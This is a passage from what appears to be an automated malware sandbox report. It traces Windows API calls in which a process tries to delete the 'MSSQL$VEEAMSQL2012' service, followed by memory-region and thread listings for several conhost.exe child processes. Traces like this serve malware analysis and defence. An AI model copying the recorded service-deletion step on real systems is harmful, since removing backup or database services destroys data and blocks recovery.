(lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0076.570] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0076.571] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.926] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0076.926] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0076.926] _wcsicmp (_String1="delete", _String2="query") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="start") returned -15 [0076.926] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0076.926] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0076.926] _wcsicmp (_String1="delete", _String2="control") returned 1 [0076.926] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0076.926] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0076.926] _wcsicmp (_String1="delete", _String2="config") returned 1 [0076.926] _wcsicmp (_String1="delete", _String2="description") returned -7 [0076.926] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0076.926] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0076.926] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0076.926] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0076.926] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0076.926] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0076.926] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0076.926] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0076.926] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0076.926] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0076.926] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0076.926] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0076.928] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xe19d28a00 [0076.932] OpenServiceW (hSCManager=0xe19d28a00, lpServiceName="MSSQL$VEEAMSQL2012", dwDesiredAccess=0x10000) returned 0x0 [0076.933] GetLastError () returned 0x424 [0076.933] _ultow (in: _Dest=0x424, _Radix=431619272 | out: _Dest=0x424) returned="1060" [0076.933] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0076.934] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xe19b9fc80, nSize=0x2, Arguments=0xe19b9fcb0 | out: lpBuffer="顐᧒\x0e") returned 0x62 [0076.934] GetFileType (hFile=0x24) returned 0x2 [0076.934] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xe19b9fc30 | out: lpMode=0xe19b9fc30) returned 1 [0077.002] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xe19d29850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xe19b9fc28, lpReserved=0x0 | out: lpBuffer=0xe19d29850*, lpNumberOfCharsWritten=0xe19b9fc28*=0x62) returned 1 [0077.002] LocalFree (hMem=0xe19d29850) returned 0x0 [0077.002] LocalFree (hMem=0x0) returned 0x0 [0077.002] CloseServiceHandle (hSCObject=0xe19d28a00) returned 1 [0077.003] LocalFree (hMem=0x0) returned 0x0 [0077.003] exit (_Code=1060) Thread: id = 326 os_tid = 0x126c Process: id = "21" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1eea1000" os_pid = "0x8ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xafc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 489 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 490 start_va = 0xaceb0d0000 end_va = 0xaceb0effff entry_point = 0x0 region_type = private name = "private_0x000000aceb0d0000" filename = "" Region: id = 491 start_va = 0xaceb0f0000 end_va = 0xaceb103fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aceb0f0000" filename = "" Region: id = 492 start_va = 0xaceb110000 end_va = 0xaceb14ffff entry_point = 0x0 region_type = private name = "private_0x000000aceb110000" filename = "" Region: id = 493 start_va = 0x7df5ff440000 end_va = 0x7ff5ff43ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff440000" filename = "" Region: id = 494 start_va = 0x7ff6c4800000 end_va = 0x7ff6c4822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4800000" filename = "" Region: id = 495 start_va = 0x7ff6c482c000 end_va = 0x7ff6c482dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c482c000" filename = "" Region: id = 496 start_va = 0x7ff6c482e000 end_va = 0x7ff6c482efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c482e000" filename = "" Region: id = 497 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 498 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 499 start_va = 0xaceb240000 end_va = 0xaceb33ffff entry_point = 0x0 region_type = private name = "private_0x000000aceb240000" filename = "" Region: id = 500 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 501 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 502 start_va = 0xaceb0d0000 end_va = 0xaceb0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aceb0d0000" filename = "" Region: id = 503 start_va = 0xaceb0e0000 end_va = 0xaceb0e6fff entry_point = 0x0 region_type = private name = "private_0x000000aceb0e0000" filename = "" Region: id = 504 start_va = 0xaceb150000 end_va = 0xaceb20dfff entry_point = 0xaceb150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 505 start_va = 0xaceb340000 end_va = 0xaceb37ffff entry_point = 0x0 region_type = private name = "private_0x000000aceb340000" filename = "" Region: id = 506 start_va = 0xaceb3c0000 end_va = 0xaceb3cffff entry_point = 0x0 region_type = private name = "private_0x000000aceb3c0000" filename = "" Region: id = 507 start_va = 0x7ff6c4700000 end_va = 0x7ff6c47fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4700000" filename = "" Region: id = 508 start_va = 0x7ff6c482a000 end_va = 0x7ff6c482bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c482a000" filename = "" Region: id = 509 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 706 start_va = 0xaceb210000 end_va = 0xaceb210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aceb210000" filename = "" Region: id = 707 start_va = 0xaceb220000 end_va = 0xaceb226fff entry_point = 0x0 region_type = private name = "private_0x000000aceb220000" filename = "" Region: id = 708 start_va = 0xaceb230000 end_va = 0xaceb230fff entry_point = 0x0 region_type = private name = "private_0x000000aceb230000" filename = "" Region: id = 709 start_va = 0xaceb380000 end_va = 0xaceb380fff entry_point = 0x0 region_type = private name = "private_0x000000aceb380000" filename = "" Region: id = 710 start_va = 0xaceb3d0000 end_va = 0xaceb557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aceb3d0000" filename = "" Region: id = 711 start_va = 0xaceb560000 end_va = 0xaceb6e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aceb560000" filename = "" Region: id = 712 start_va = 0xaceb6f0000 end_va = 0xacecaeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000aceb6f0000" filename = "" Region: id = 713 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 714 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 715 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 716 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 717 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 718 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 719 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 720 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 721 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 722 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 723 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 22 os_tid = 0x210 Thread: id = 38 os_tid = 0xc74 Thread: id = 63 os_tid = 0xcf4 Thread: id = 248 os_tid = 0x10e4 Process: id = "22" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xe570000" os_pid = "0x65c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x8d4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 510 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 511 start_va = 0x977cd40000 end_va = 0x977cd5ffff entry_point = 0x0 region_type = private name = "private_0x000000977cd40000" filename = "" Region: id = 512 start_va = 0x977cd60000 end_va = 0x977cd73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000977cd60000" filename = "" Region: id = 513 start_va = 0x977cd80000 end_va = 0x977cdbffff entry_point = 0x0 region_type = private name = "private_0x000000977cd80000" filename = "" Region: id = 514 start_va = 0x7df5ffe60000 end_va = 0x7ff5ffe5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe60000" filename = "" Region: id = 515 start_va = 0x7ff6c3c70000 end_va = 0x7ff6c3c92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3c70000" filename = "" Region: id = 516 start_va = 0x7ff6c3c98000 end_va = 0x7ff6c3c98fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3c98000" filename = "" Region: id = 517 start_va = 0x7ff6c3c9e000 end_va = 0x7ff6c3c9ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3c9e000" filename = "" Region: id = 518 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 519 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 520 start_va = 0x977cf40000 end_va = 0x977d03ffff entry_point = 0x0 region_type = private name = "private_0x000000977cf40000" filename = "" Region: id = 521 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 522 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 958 start_va = 0x977cd40000 end_va = 0x977cd4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000977cd40000" filename = "" Region: id = 959 start_va = 0x977cd50000 end_va = 0x977cd56fff entry_point = 0x0 region_type = private name = "private_0x000000977cd50000" filename = "" Region: id = 960 start_va = 0x977cdc0000 end_va = 0x977ce7dfff entry_point = 0x977cdc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 961 start_va = 0x977ce80000 end_va = 0x977cebffff entry_point = 0x0 region_type = private name = "private_0x000000977ce80000" filename = "" Region: id = 962 start_va = 0x977cec0000 end_va = 0x977cec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000977cec0000" filename = "" Region: id = 963 start_va = 0x977ced0000 end_va = 0x977ced6fff entry_point = 0x0 region_type = private name = "private_0x000000977ced0000" filename = "" Region: id = 964 start_va = 0x977cee0000 end_va = 0x977cee0fff entry_point = 0x0 region_type = private name = "private_0x000000977cee0000" filename = "" Region: id = 965 start_va = 0x977cef0000 end_va = 0x977cef0fff entry_point = 0x0 region_type = private name = "private_0x000000977cef0000" filename = "" Region: id = 966 start_va = 0x977d040000 end_va = 0x977d1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000977d040000" filename = "" Region: id = 967 start_va = 0x977d210000 end_va = 0x977d21ffff entry_point = 0x0 region_type = private name = "private_0x000000977d210000" filename = "" Region: id = 968 start_va = 0x977d220000 end_va = 0x977d3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000977d220000" filename = "" Region: id = 969 start_va = 0x977d3b0000 end_va = 0x977e7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000977d3b0000" filename = "" Region: id = 970 start_va = 0x7ff6c3b70000 end_va = 0x7ff6c3c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3b70000" filename = "" Region: id = 971 start_va = 0x7ff6c3c9c000 end_va = 0x7ff6c3c9dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3c9c000" filename = "" Region: id = 972 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 973 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 974 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 975 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 976 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 977 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 978 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 979 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 980 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 981 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 982 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 983 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 23 os_tid = 0xa14 Thread: id = 39 os_tid = 0xc78 Thread: id = 64 os_tid = 0xcf8 Thread: id = 260 os_tid = 0x1124 Process: id = "23" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xaf09000" os_pid = "0xc04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x4cc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 523 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 524 start_va = 0xe1a4760000 end_va = 0xe1a477ffff entry_point = 0x0 region_type = private name = "private_0x000000e1a4760000" filename = "" Region: id = 525 start_va = 0xe1a4780000 end_va = 0xe1a4793fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e1a4780000" filename = "" Region: id = 526 start_va = 0xe1a47a0000 end_va = 0xe1a47dffff entry_point = 0x0 region_type = private name = "private_0x000000e1a47a0000" filename = "" Region: id = 527 start_va = 0x7df5ff530000 end_va = 0x7ff5ff52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff530000" filename = "" Region: id = 528 start_va = 0x7ff6c4380000 end_va = 0x7ff6c43a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4380000" filename = "" Region: id = 529 start_va = 0x7ff6c43ac000 end_va = 0x7ff6c43adfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c43ac000" filename = "" Region: id = 530 start_va = 0x7ff6c43ae000 end_va = 0x7ff6c43aefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c43ae000" filename = "" Region: id = 531 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 532 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 533 start_va = 0xe1a4800000 end_va = 0xe1a48fffff entry_point = 0x0 region_type = private name = "private_0x000000e1a4800000" filename = "" Region: id = 534 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 535 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 724 start_va = 0xe1a4760000 end_va = 0xe1a476ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e1a4760000" filename = "" Region: id = 725 start_va = 0xe1a4770000 end_va = 0xe1a4776fff entry_point = 0x0 region_type = private name = "private_0x000000e1a4770000" filename = "" Region: id = 726 start_va = 0xe1a47e0000 end_va = 0xe1a47e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e1a47e0000" filename = "" Region: id = 727 start_va = 0xe1a47f0000 end_va = 0xe1a47f6fff entry_point = 0x0 region_type = private name = "private_0x000000e1a47f0000" filename = "" Region: id = 728 start_va = 0xe1a4900000 end_va = 0xe1a49bdfff entry_point = 0xe1a4900000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 729 start_va = 0xe1a49c0000 end_va = 0xe1a49fffff entry_point = 0x0 region_type = private name = "private_0x000000e1a49c0000" filename = "" Region: id = 730 start_va = 0xe1a4a00000 end_va = 0xe1a4b87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e1a4a00000" filename = "" Region: id = 731 start_va = 0xe1a4b90000 end_va = 0xe1a4b90fff entry_point = 0x0 region_type = private name = "private_0x000000e1a4b90000" filename = "" Region: id = 732 start_va = 0xe1a4ba0000 end_va = 0xe1a4baffff entry_point = 0x0 region_type = private name = "private_0x000000e1a4ba0000" filename = "" Region: id = 733 start_va = 0xe1a4bb0000 end_va = 0xe1a4d30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e1a4bb0000" filename = "" Region: id = 734 start_va = 0xe1a4d40000 end_va = 0xe1a613ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e1a4d40000" filename = "" Region: id = 735 start_va = 0xe1a6140000 end_va = 0xe1a6140fff entry_point = 0x0 region_type = private name = "private_0x000000e1a6140000" filename = "" Region: id = 736 start_va = 0x7ff6c4280000 end_va = 0x7ff6c437ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4280000" filename = "" Region: id = 737 start_va = 0x7ff6c43aa000 end_va = 0x7ff6c43abfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c43aa000" filename = "" Region: id = 738 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 739 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 740 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 741 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 742 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 743 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 744 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 745 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 746 start_va = 0x7ffc02160000 end_va = 